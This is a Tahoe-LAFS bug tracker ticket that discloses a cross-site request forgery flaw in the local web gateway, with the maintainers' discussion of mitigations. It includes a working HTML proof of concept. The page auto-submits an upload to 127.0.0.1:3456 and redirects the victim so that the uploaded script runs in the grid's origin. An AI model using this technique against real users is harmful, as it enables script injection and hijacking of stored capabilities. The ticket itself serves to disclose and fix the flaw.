#1859 new defect

Proof-of-concept attack: Upload and execute attacker controlled js from any domain. — at Version 3

Reported by: nejucomo Owned by: davidsarah
Priority: major Milestone: undecided
Component: code-frontend-web Version: 1.9.2
Keywords: security javascript same-origin capleak websec Cc: frederik.braun+tahoe@…
Launchpad Bug:

Description (last modified by nejucomo)

Proof of Concept Attack

The following proof of concept shows how an html file loaded from any domain into (some) browsers with javascript enabled can inject an attacker controlled script into a grid, and then cause the user to execute that script in the domain of the grid:

<html>
<head>
<script>

var PAYLOAD = '\x3chtml\x3e\x3chead\x3e\x3cscript\x3ealert("OH NOES! WHY ATTACKER CODE IN MAI DOMAIN " + document.domain + "?!")\x3c/script\x3e\x3c/head\x3e\x3c/html\x3e';

window.onload = function () {
  var payload_input = document.getElementById('payload_input');
  payload_input.value = PAYLOAD

  var the_form = document.getElementById('the_form');
  the_form.submit();
}

</script>
</head>

<body id="body">

<p>
demo attack:
</p>

<p>
This page attempts to inject an attacker controlled script into a <a
href="https://tahoe-lafs.org">tahoe-lafs</a> grid, no matter which domain
this file is loaded from.
</p>

<form id="the_form"
      method="POST"
      action="http://127.0.0.1:3456/uri?t=upload&when_done=/uri/%25(uri)s?filename=payload.html"
      enctype="multipart/form-data"
      >
<input id="payload_input" type="text" name="file"></input>
</form>

</body>
</html>

Mitigations:

There are several moving parts at work here. The when_done parameter with uri substitution was very convenient.

I think an upload capability would be the most consistent and thorough solution. Removing bits and pieces which may otherwise be useful, like when_done, feels like a piecemeal defense.

Requiring CSRF tokens may be more comprehensive, but also doesn't sit well with the rest of the capability model. (A CSRF token would be a bit like a "make a this kind of http request" temporary capability.)

Related Tickets:

  • #615 is about illicitly gaining victim capabilities; whereas this ticket is about bootstrapping an attack and/or abusing ambient authority.
  • #1215 is about adding CORS support and how that may create a vulnerability; this script demonstrates even without CORS support similar vulnerabilities already exist.

Change History (3)

comment:1 Changed at 2012-11-15T02:50:25Z by davidsarah

  • Component changed from unknown to code-frontend-web
  • Keywords security javascript same-origin capleak added
  • Priority changed from normal to major

comment:2 Changed at 2012-11-15T02:55:43Z by nejucomo

  • Description modified (diff)

comment:3 Changed at 2012-11-15T04:15:46Z by nejucomo

  • Description modified (diff)
Note: See TracTickets for help on using tickets.